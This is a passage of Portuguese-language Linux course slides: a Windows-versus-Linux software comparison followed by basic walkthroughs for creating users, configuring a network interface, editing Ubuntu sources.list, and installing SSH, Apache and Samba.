Autocad Qcad Programa com funções genéricas
Visio dia Possui funcionalidades identicas e ótimo conjunto de ícones
winamp xmms Possui todos os recursos do programa para Windows além de filtros que
permite acrescentar efeitos digitais da música (em tempo real), eco, etc.
media
player
mplayer,
playmidi
xwave,
Programas para execução de arquivos de música e videos multimídia.
Existem outras alternativas, a escolha depende de seu gosto e da
sofisticação do programa.
Agente de
Sistema
cron Pouca diferença. O cron da mais liberdade na programação de tarefas a
serem executadas pelo Linux.
Bate-Papo talk, ytalk O talk e o ytalk permite a conversa de dois usuários não só através de uma
rede local, mas de qualquer parte do planeta, pois usa o protocolo tcp/ip
para comunicação. Muito útil e fácil de usar.
IIS, Pers. Web Server
Apache
O apache é o servidor WEB mais usado no mundo (algo em torno de 75%
das empresas), muito rápido e flexível de se configurar.
Exchange,
NT Mail
Postfix,
Sendmail
Exim, Qmail
72% da base de servidores de emails no mundo atualmente roda em
software livre. Os mais recomendados são o Postfix e o qmail, devido a
segurança, velocidade e integridade de mensagem
Comparação dos Programas do Windows x Linux
354
Windows Linux Diferenças
Wingate, MS
Proxy
kerio
Squid, Apache
Ip masquerade, nat,
diald, exim,
,A migração de um servidor proxy para Linux requer o uso de
vários programas separados para que se tenha um resultado
profissional. Isto pode parecer incomodo no começo, mas você logo
perceberá que a divisão de serviços entre programas é mais
produtivo. Quando desejar substituir um deles, o funcionamento dos
outros não serão afetados. Não vou entrar em detalhes sobre os
programas citados ao lado, mas o squid é um servidor proxy Web
(HTTP e HTTPS) completo e também apresenta um excelente
serviço FTP. Possui outros módulos como dns, ping, restrições de
acesso, limites de tamanho de arquivos, cache, etc.
MS
Frontpage
Mozilla e muitas outras
ferramentas para a
geração WEB (como
zope, do site da
distribuição Debian
php3, php4, wdm, htdig)
Sem comentários... todas são
ferramentas para de grandes Web Sites. O wdm,
geração de conteúdo por exemplo, é usado na geração
(http://www.debian.org) em 30 idiomas diferentes.
MS Winsock Sem equivalente O Linux tem suporte nativo a tcp/ip desde o começo de sua
existência e não precisa de nenhuma camada de comunicação entre
ele e a Internet. A performance é aproximadamente 10% maior em
conexões Internet via fax-modem e outras redes tcp/ip.
AVG,
Viruscan,
Clamavis,
AVG , F-
PROT, CPAV.
AVG, Viruscan, Clamavis,
AVG , F-PROT, CPAV
Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan
disponibilizam versões para Linux,com o objetivo principal de
remoção de vírus em servidores de E-mail ou servidores de arquivos,
com o objetivo de não contaminar os vulneráveis sistemas Windows,
servindo como uma efetiva barreira de defesa na rede.
Comparação dos Programas do Windows x Linux
355
Windows Linux Diferenças
Wingate, MS
Proxy
kerio
Squid, Apache
Ip masquerade, nat,
diald, exim,
,A migração de um servidor proxy para Linux requer o uso de
vários programas separados para que se tenha um resultado
profissional. Isto pode parecer incomodo no começo, mas você logo
perceberá que a divisão de serviços entre programas é mais
produtivo. Quando desejar substituir um deles, o funcionamento dos
outros não serão afetados. Não vou entrar em detalhes sobre os
programas citados ao lado, mas o squid é um servidor proxy Web
(HTTP e HTTPS) completo e também apresenta um excelente
serviço FTP. Possui outros módulos como dns, ping, restrições de
acesso, limites de tamanho de arquivos, cache, etc.
MS
Frontpage
Mozilla e muitas outras
ferramentas para a
geração WEB (como
zope, do site da
distribuição Debian
php3, php4, wdm, htdig)
Sem comentários... todas são
ferramentas para de grandes Web Sites. O wdm,
geração de conteúdo por exemplo, é usado na geração
(http://www.debian.org) em 30 idiomas diferentes.
MS Winsock Sem equivalente O Linux tem suporte nativo a tcp/ip desde o começo de sua
existência e não precisa de nenhuma camada de comunicação entre
ele e a Internet. A performance é aproximadamente 10% maior em
conexões Internet via fax-modem e outras redes tcp/ip.
AVG,
Viruscan,
Clamavis,
AVG , F-
PROT, CPAV.
AVG, Viruscan, Clamavis,
AVG , F-PROT, CPAV
Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan
disponibilizam versões para Linux,com o objetivo principal de
remoção de vírus em servidores de E-mail ou servidores de arquivos,
com o objetivo de não contaminar os vulneráveis sistemas Windows,
servindo como uma efetiva barreira de defesa na rede.
Criação de Usuários sudo adduser <nome_user>
sudo passwd <nome_user>
cat /etc/passwd
cat /etc/group
Exercício: Crie um usuário com o seu nome, e um
grupo chamado aula. Associe o usuário ao grupo
aula e depois ao grupo virtual
356
$sudo adduser <nome>
$sudo addgroup aula
$vi /etc/group
$vi /etc/passwd
Configuração de rede 1. Descubra o modelo de sua placa de rede, digite:
# lspci
O resultado de ser algo como:
Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev8b)
2. Agora veja em que eth o seu sistema identificou a placa, se for uma única placa
de rede provavelmente eth0. Use o comando:
# cat /var/log/messages | egrep "eth"
O resultado dever ser:
Oct 20 11:18:55 fw2 kernel: eth0: VIA VT6105 Rhine-III at 0xec00,
00:xx:xx:xx:xx:xx, IRQ 5.
3. Beleza, sabendo que sua placa é uma VIA Rhine, carregue o módulo referente.
# vi /etc/modules
Coloque o seguinte:
alias eth0 via-rhine.ko
357
Configuração de rede
4. Vamos editar o arquivo que é verificado quando o serviço de rede é iniciado:
# vi /etc/network/interfaces
Coloque a seguinte linha neste arquivo para ip dinâmico:
auto eth0
iface eth0 inet dhcp
ou o seguinte linhas para ip fixo:
auto eth0
iface eth0 inet static
address 192.168.0.1
network 192.168.254.254
broadcast 192.168.0.255
gateway 192.168.0.254
5. Para iniciar o serviço de rede execute o comando:
# invoke-rc.d network start
358
Configuração de rede
É só testar agora:
# ping 192.168.254.35
PING 192.168.254.35 (192.168.254.35) 56(84) bytes of data.
64 bytes from 192.168.254.35: icmp_seq=0 ttl=64 time=0.262 ms
64 bytes from 192.168.254.35: icmp_seq=1 ttl=64 time=0.102 ms
64 bytes from 192.168.254.35: icmp_seq=2 ttl=64 time=0.155 ms
6. Para confirmar se sua interface está ativa digite:
# ifconfig
Se estive ok deve mostrar:
eth0 Encapsulamento do Link: Ethernet Endereço de HW 00:xx:xx:xx:xx:xx
inet end.: 192.168.0.1 Bcast:192.168.0.255 Masc:255.255.255.0 UP
BROADCASTRUNNING MULTICAST MTU:1500 Métrica:1 pacotes
RX:13951137 erros:0 descart.:0 sobrepos.:0 quadro:0 pacotes TX:9849100
erros:0 descart.:0 sobrepos.:0 portadora:0 colisões:0 txqueuelen:1000 RX
bytes:4069140904 (1.6 Mb) TX bytes:1802073588 (8.5 Mb) IRQ:10
Endereço de E/S:0xde00 7. Não esqueça de colocar o serviço para ser iniciado
toda vez que ligar a máquina. Use o comando:
# update-rc.d -f network defaults
359
Configuração de serviços
Editar o arquivo souce.list
- vi /etc/apt/souce.list
360
# Ubuntu supported packages
deb http://us.archive.ubuntu.com/ubuntu hardy main restricted
deb-src http://us.archive.ubuntu.com/ubuntu hardy restricted main multiverse universe
deb http://us.archive.ubuntu.com/ubuntu hardy-updates main restricted
deb-src http://us.archive.ubuntu.com/ubuntu hardy-updates restricted main multiverse universe
deb http://security.ubuntu.com/ubuntu hardy-security main restricted
deb-src http://security.ubuntu.com/ubuntu hardy-security restricted main multiverse universe
# Ubuntu community supported packages
deb http://us.archive.ubuntu.com/ubuntu hardy universe multiverse
deb http://us.archive.ubuntu.com/ubuntu hardy-updates universe multiverse
deb http://security.ubuntu.com/ubuntu hardy-security universe multiverse
# Ubuntu backports project
deb http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse
deb-src http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse
deb http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe
deb-src http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe
Sources.list para a família Ubuntu Feisty Fawn
# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://br.archive.ubuntu.com/ubuntu/ feisty main restricted
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty universe
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty multiverse
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu feisty-security main restricted
deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted
deb http://security.ubuntu.com/ubuntu feisty-security universe
deb-src http://security.ubuntu.com/ubuntu feisty-security universe
deb http://security.ubuntu.com/ubuntu feisty-security multiverse
deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse
361
Configuração de serviços
Apt-get update
Apt-get upgrade
Apt-get install <pacote ou serviço>
362
Instalação do SSH
sudo apt-apt get update
sudo apt-get install openssh-server
vi /etc/ssh/sshd_config
sudo /etc/init.d/ssh restart
Putty free e winscp
363
Instalação do Apache sudo apt-get install apache2
Verificar o Local da pasta Base:
sudo vi /etc/apache2/sites-available/default
- Alterar o DocumentRoot de /var/www/
para /var/www/site2/
Copiar o site do seu micro para a
/var/www/ (colocar primeiro na sua pasta
home e depois usar o comando
sudo cp –R /home/virtual/site2 /var/www/
364
Instalação do Apache Alterar o arquivo de procurar do nome
inicial, no nosso caso será acrescentar
o index.htm, isto dentro do diretório
/etc/apache2/httpd.conf
sudo i /etc/apache2/httpd.conf
<IfModule dir_module>
DirectoryIndex index2.htm index.html
index.htm index.shtml index.php
index.php5 index.php4 index.php3
index.phtml index.cgi
</IfModule>
365
Instalação do samba
apt-get install samba
Editar o arquivo /etc/samba/smb.conf
vi /etc/samba/smb.conf
Reinicializar o serviço
sudo /ets/init.d/samba restart
366
[global]
workgroup = AULA
netbios name = SRV-AULA
# server string = %h server (Samba, Ubuntu)
server string =
#----------------------------------------------
#
kernel oplocks = no
socket options = TCP_NODELAY IPTOS_LOWDELAY
SO_KEEPALIVE SO_RCVBUF=8192 SO_SNDB$
#------------------------------------------------
passdb backend = tdbsam
security = user
username map = /etc/samba/smbusers
name resolve order = wins bcast hosts
domain logons = yes
preferred master = yes
wins support = yes
367
#============== Share Definitions ==================
[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
#nome do compartilhamento
[arquivos]
comment = Pasta Publica
path = /arquivos
valid users = teste
#force group = users
create mask = 0660
directory mask = 0771
writable = yes
368
Configuração de Serviço
(Gráfico)
369
Configuração de Serviço
(Gráfico)
370
“Se você não pode proteger o que tem, você não tem nada.” Anônimo
372
Fim do Curso.
Reflexão: “Os computadores são incrivelmente rápidos, precisos e burros; os
homens são incrivelmente lentos, imprecisos e brilhantes; juntos, seu
poder ultrapassa os limites da Imaginação” – Albert Einstein
Dúvidas